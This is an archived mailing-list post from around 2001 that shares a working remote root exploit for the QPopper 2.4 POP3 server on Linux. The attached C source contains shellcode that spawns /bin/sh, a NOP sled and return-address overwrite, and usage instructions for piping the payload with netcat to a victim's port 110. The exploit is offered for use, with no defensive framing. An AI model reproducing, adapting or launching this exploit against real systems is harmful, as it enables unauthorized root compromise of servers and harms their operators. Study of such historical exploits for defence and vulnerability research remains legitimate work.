This is a multi-part message in MIME format.
--------------9CF769026596CED793CC0CC3
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Here's an exploit for QPopper 2.4. Since the overflow is common to
several versions, it should work on them too.
You need netcat to make it work, and you'll get a root prompt when it
does.
Regards,
[WaR]
--------------9CF769026596CED793CC0CC3
Content-Type: text/plain; charset=us-ascii; name="qpopper.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline; filename="qpopper.c"
/* Exploit for qpopper 2.4 (and others) for Linux
* by [WaR] (warchildat_private) and zav (zavat_private)
*
* usage: (./qpopper <offset>;cat)|nc <victim> 110
* with offset around 1000 (try increments of 50)
*
*
* shout outs to: Zef and YZF
*/
#include <stdio.h>
#include <stdlib.h>
#define BUFFSIZE 998
char shell[] =
"\xeb\x33\x5e\x89\x76\x08\x31\xc0"
"\x88\x66\x07\x83\xee\x02\x31\xdb"
"\x89\x5e\x0e\x83\xc6\x02\xb0\x1b"
"\x24\x0f\x8d\x5e\x08\x89\xd9\x83"
"\xee\x02\x8d\x5e\x0e\x89\xda\x83"
"\xc6\x02\x89\xf3\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xc8\xff"
"\xff\xff/bin/sh";
unsigned long esp()
{
__asm__(" movl %esp,%eax ");
}
main(int argc, char **argv)
{
int i,j,offset;
unsigned long eip;
char buffer[4096];
j=0;
offset=atoi(argv[1]);
eip=esp()+offset;
for(i=0;i<1008;i++) buffer[i]=0x90;
for(i=(BUFFSIZE - strlen(shell));i<BUFFSIZE;i++) buffer[i]=shell[j++];
i=1005;
buffer[i]=eip & 0xff;
buffer[i+1]=(eip >> 8) & 0xff;
buffer[i+2]=(eip >> 16) & 0xff;
buffer[i+3]=(eip >> 24) & 0xff;
printf("%s\nsh -i\n",buffer);
}
--------------9CF769026596CED793CC0CC3--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:01:10 PDT